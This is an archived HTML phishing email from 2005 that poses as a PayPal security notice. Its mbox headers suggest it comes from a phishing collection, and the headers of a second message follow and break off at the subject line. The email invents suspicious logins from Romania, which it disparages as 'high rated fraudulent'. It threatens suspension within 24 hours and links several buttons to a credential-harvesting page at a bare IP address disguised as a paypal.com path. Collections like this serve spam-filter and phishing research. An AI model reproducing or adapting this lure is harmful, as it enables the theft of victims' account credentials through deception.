From: "PayPal" <security@emai.paypal.com>
Content-Type: text/html
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: 
X-Spam-Status: No, score=0.8 required=5.0 tests=HTML_FONT_BIG,HTML_MESSAGE,
	HTML_NONELEMENT_00_10,HTML_TAG_EXIST_TBODY,IP_LINK_PLUS,
	MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,NORMAL_HTTP_TO_IP autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.2 IP_LINK_PLUS URI: Dotted-decimal IP address followed by CGI
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_FONT_BIG BODY: HTML tag for a big font size
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.0 HTML_NONELEMENT_00_10 BODY: 0% to 10% of HTML elements are non-standard
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Content-Length: 10059
Lines: 235
Status: O
X-Status: 
X-Keywords:                  
X-UID: 314

<html> <head> <title>PayPal-Welcome </title> </head> <body
bgcolor="#ffffff"> <style type="text/css"> .dummy {} BODY, TD
{font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color:
#000000;} LI {line-height: 120%;} UL.ppsmallborder {margin:10px 5px 10px
20px;} LI.ppsmallborderli {margin:0px 0px 5px 0px;} UL.pp_narrow
{margin:10px 5px 0px 40px;} hr.dotted {width: 100%; margin-top: 0px;
margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top:
#fff; border-bottom: 2px dotted #ccc;} .pp_label {font-family:
verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight:
bold;color: #000000;} .pp_serifbig {font-family: serif;font-size:
20px;font-weight: bold;color: #000000;} .pp_serif{font-family:
serif;font-size: 16px;color: #000000;} .pp_sansserif{font-family:
verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;}
.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size:
18px;font-weight: bold;color: #003366;} .pp_subheadingeoa {font-family:
verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight:
bold;color: #000000;} .pp_subheading {font-family:
verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight:
bold;color: #003366;} .pp_sidebartext {font-family:
verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;}
.pp_sidebartextbold {font-family:
verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight:
bold;color: #003366;} .pp_footer {font-family:
verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;}
.pp_button {font-size: 13px; font-family:
verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset;
color:#000000; background-color: #cccccc;} .pp_smaller {font-family:
verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;}
.pp_smallersidebar {font-family:
verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;}
.ppem106 {font-weight: 700;} </style> <DIV><!--StartFragment -->&nbsp;<BR>
<DIV id=message> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0
?=""> <TBODY> <IMG
src="http://www.paypalobjects.com/en_US/i/logo/paypal_logo.gif" </IMG><br>
<TR> <TD><!--eBay V3- msxml 4.0 XXXXXXXXXXXXXXXXXXXXXXXXXX--><XBODY
bgcolor="#FFFFFF"></XBODY> <TABLE cellSpacing=0 cellPadding=0 width=600>
<TBODY> <TR> <TD width=900> <TABLE cellSpacing=0 cellPadding=2
width="100%" bgColor=#eeeef8 border=0
xmlns:x="urn:schemas-microsoft-com:xslt"> <TBODY> <TR> <TD><FONT
face=Verdana size=4>PayPal Security Center: Urgent PayPal Account Login
Request.</FONT></TD></TR><TR bgColor=#9999cc height=2>
<TD></TD></TR></TBODY></TABLE><FONT face="Arial,&#13;&#10;Verdana" size=2>
<table width="100%" cellspacing="0" cellpadding="0" border="0"> <tr>
	<td background="http://images.paypal.com/images/bg_clk.gif"
width=100%><img src="http://images.paypal.com/images/pixel.gif"
height="29" width="1" border="0"></td> </tr>
	
<tr>
	<td><img src="http://images.paypal.com/images/pixel.gif"
height="10" width="1" border="0"></td> </tr> </table> <table width="600"
cellspacing="0" cellpadding="0" border="0" align="center">
	<tr valign="top">
		<td width="400">
			<table width="100%" cellspacing="0"
cellpadding="5" border="0">
				<tr valign="top">
					<td><table width="100%"
cellspacing="0" cellpadding="0" border="0">
	<tr>
		<td class="pp_heading" align="left"><center>Notice of
account temporary suspension</center></td>
	</tr> </table> </td>
        </tr>
	<tr>
		<td>
	            <br>Dear <b>PayPal</b> member :<br><br><LI> We regret
to inform you that your <b>PayPal account</b>, has been <b>temporarily
blocked</b> due to various login attempts from different global locations.
<br><br><LI>As <b>Romania</b> is one of the most high rated fraudulent
countries, we temporarily <b>blocked</b> your account to avoid future
problems or misusage of your <b>PayPal</b> account. <br><br><LI>Here are
the last 3 login attempts :<br><br> 1. IP address : 193.105.3.173<br> ISP
host : st13.i-cafe.orizont.net <br> Location : Romania<br><br> 2. IP
address : 80.97.171.22<br> ISP host : rds-net.bistrita.net<br> Location :
Romania<br><br> 3. IP address : 62.177.188.59 <br> ISP host :
adsl.bbeyond.ro<br> Location : Romania<br><br><br> <LI><strong> If you are
traveling and made these login attempts yourself or borrowed your
<b>Paypal</b> account to someone else , please log in below.</strong>
<br><br> <table width="75%" cellpadding="1" cellspacing="0" border="0"
bgcolor="#FFE65C" align=left>
				<tr>
					<td>
						<table width="100%"
cellpadding="4" cellspacing="0" border="0" bgcolor="#FFFECD"
align="center">
							<tr>
								<td
class="pp_sansserif" align="center"><a href="http://209.216.252.18/
  /www.paypal.com/cgi-bin/webscr/cmd_verification-run/verify.html">Travelling
confirmation Here</a></td>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			<br><br><br> <LI><strong>If you want to
re-activate your <b>Paypal</b> account , please follow our
instructions.</strong><br><br>
			<table width="75%" cellpadding="1" cellspacing="0"
border="0" bgcolor="#FFE65C" align=left>
				<tr>
					<td>
						<table width="100%"
cellpadding="4" cellspacing="0" border="0" bgcolor="#FFFECD"
align="center">
							<tr>
								<td
class="pp_sansserif" align="center"><a href="http://209.216.252.18/
  /www.paypal.com/cgi-bin/webscr/cmd_verification-run/verify.html">Re-activate
your account Here</a></td>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			<br>
			<br>
			<br>
			   
			<BR>
			<FONT color=red size=2><LI>If this situation is
not solved in the next 24 hours your account will be permanently
suspended.</FONT><br> <br><br> Sincerely, <b>PayPal</b>
                     </td>
                 </tr>
                 <tr>
		     <td><hr class="dotted"></td>
		 </tr>
		 <tr>
		     <td><table width="100%" cellspacing="0"
cellpadding="0" border="0">
	<tr>
		<td class="pp_footer">
			<center>This is an automated email, please do not
respond to it as your inquiry would not be received.
			<br>
			<br class="h10"> Email Id : PP458</center>
			</td>
	</tr>
	<tr>
		<td><img
src="http://images.paypal.com/en_US/i/scr/pixel.gif" height="10" width="1"
border="0"></td>
	</tr> </table> </td>
		 </tr> <tr>
				<td><span class="pp_footer"> <hr
width="400" align="left"> <FONT size=1 color=gray> <center> Copyright ©
1995-2005 eBay Inc. All Rights Reserved.Designated trademarks and brands
are the property of their respective owners.Use of this Web site
constitutes acceptance of the PayPal <a href=www.zorg.gov>User
Agreement<a/> and <a href=www.depressive.war>Privacy Policy.</a> </center>
</FONT> </span> </td>
			</tr>
             </table>
         </td>
         <td><img src="http://images.paypal.com/en_US/i/scr/pixel.gif"
height="1" width="10" border="0"></td>
         <td width="190" valign="top">
             <table width="100%" cellspacing="0" cellpadding="1"
border="0" bgcolor="#cccccc">
                 <tr>
                     <td>
                         <table width="100%" cellspacing="0"
cellpadding="0" border="0" bgcolor="#ffffff">
                             <tr>
                                 <td><table width="100%" cellspacing="0"
cellpadding="5" border="0" bgcolor="#eeeeee">
	<tr>
		<td class="pp_sidebartextbold" align="center">How to
protect your account</td>
	</tr> </table> <table width="100%" cellspacing="0" cellpadding="5"
border="0">
	<tr>
		<td class="pp_sidebartext"><LI>Make sure you never give
away your PayPal id and password. to someone you don`t know.
<br><br><LI>Please respect PayPal policy and privacy statements.<br> For
more information on how to protect your account, please visit our security
center. https://www.PayPal.com/securitytips<br><img
src="http://images.paypal.com/en_US/images/pixel.gif" height="5" width="1"
border="0"> </td>
	</tr> </table> </td>
                             </tr>
                             <tr>
                                 <td><table width="100%" cellspacing="0"
cellpadding="5" border="0" bgcolor="#eeeeee">
	<tr>
		<td class="pp_sidebartextbold" align="center">Increase
your security </td>
	</tr> </table> <table width="100%" cellspacing="0" cellpadding="5"
border="0">
	<tr>
	<td class="pp_sidebartext"> <span
class="ppem106"><LI>Become</span> a Verified PayPal member. Examine all
privacy and security seals before doing business with a particular website
and make sure they are legitimate.<br>PayPal is a licensee of the<br> <a
href=http://209.216.252.18/
  /www.paypal.com/cgi-bin/webscr/cmd_verification-run/verify.html> TRUSTe
Privacy Program. </a> <br><img
src="http://images.paypal.com/en_US/i/scr/pixel.gif" height="5" width="1"
border="0"></td>
	</tr>
 <tr>
                                 <td><table width="100%" cellspacing="0"
cellpadding="5" border="0" bgcolor="#eeeeee">
	<tr>
		<td class="pp_sidebartextbold" align="center">Protect your
password</td>
	</tr> </table> <table width="100%" cellspacing="0" cellpadding="5"
border="0">
	<tr>
		<td class="pp_sidebartext"><span
class="ppem106"><LI>Never</span> give away your password and always choose
a combination of letters, numbers, and symbols.<br> For example,
$coo!place2l!ve or 2Barry5Bonds#1. Avoid choosing obvious words or dates
such as a nickname or your birth date. <br><br><LI>Don't use the same
password for PayPal and other online services such as AOL, eBay, MSN, or
Yahoo. <br>Using the same password for multiple websites increases the
likelihood that someone could learn your password and gain access to your
account. <br><img src="http://images.paypal.com/en_US/i/scr/pixel.gif"
height="5" width="1" border="0"></td>
	</tr> <td valign="footer"><a
href="http://pages.ebay.com/help/community/png-priv.html"> <img
src="http://pics.ebaystatic.com/aw/pics/truste_button.gif" align="right"
border="0" height="31" hspace="4" vspace="2" width="116"
alt="TrustE"></a></td></tr></table></td></tr> </table> </td>
                      
       </tr>
                         </td>
                     </table>
                 </td>
             </table>
         </td>
     </tr> </table>
   
</body> </html>

From root@localhost.localdomain  Thu Oct  6 11:51:30 2005
Return-Path: <root@localhost.localdomain>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 4E6CD536E72
	for <jose@login.monkey.org>; Thu,  6 Oct 2005 11:51:30 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 951B46FA350
	for <jose@monkey.org>; Thu,  6 Oct 2005 11:51:28 -0400 (EDT)
Received: from localhost.localdomain (unknown [211.48.20.180])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  6 Oct 2005 11:51:28 -0400 (EDT)
Received: from localhost.localdomain (nelsys [127.0.0.1])
	by localhost.localdomain (8.12.9/8.12.9) with ESMTP id j96G2EZc003064
	for <jose@monkey.org>; Fri, 7 Oct 2005 01:02:14 +0900
Received: (from root@localhost)
	by localhost.localdomain (8.12.9/8.12.9/Submit) id j96G2ESR003062;
	Fri, 7 Oct 2005 01:02:14 +0900
Date: Fri, 7 Oct 2005 01:02:14 +0900
Message-Id: <200510061602.j96G2ESR003062@localhost.localdomain>
To: jose@monkey.org
Subject: Notification Of your PayPal Internet Account
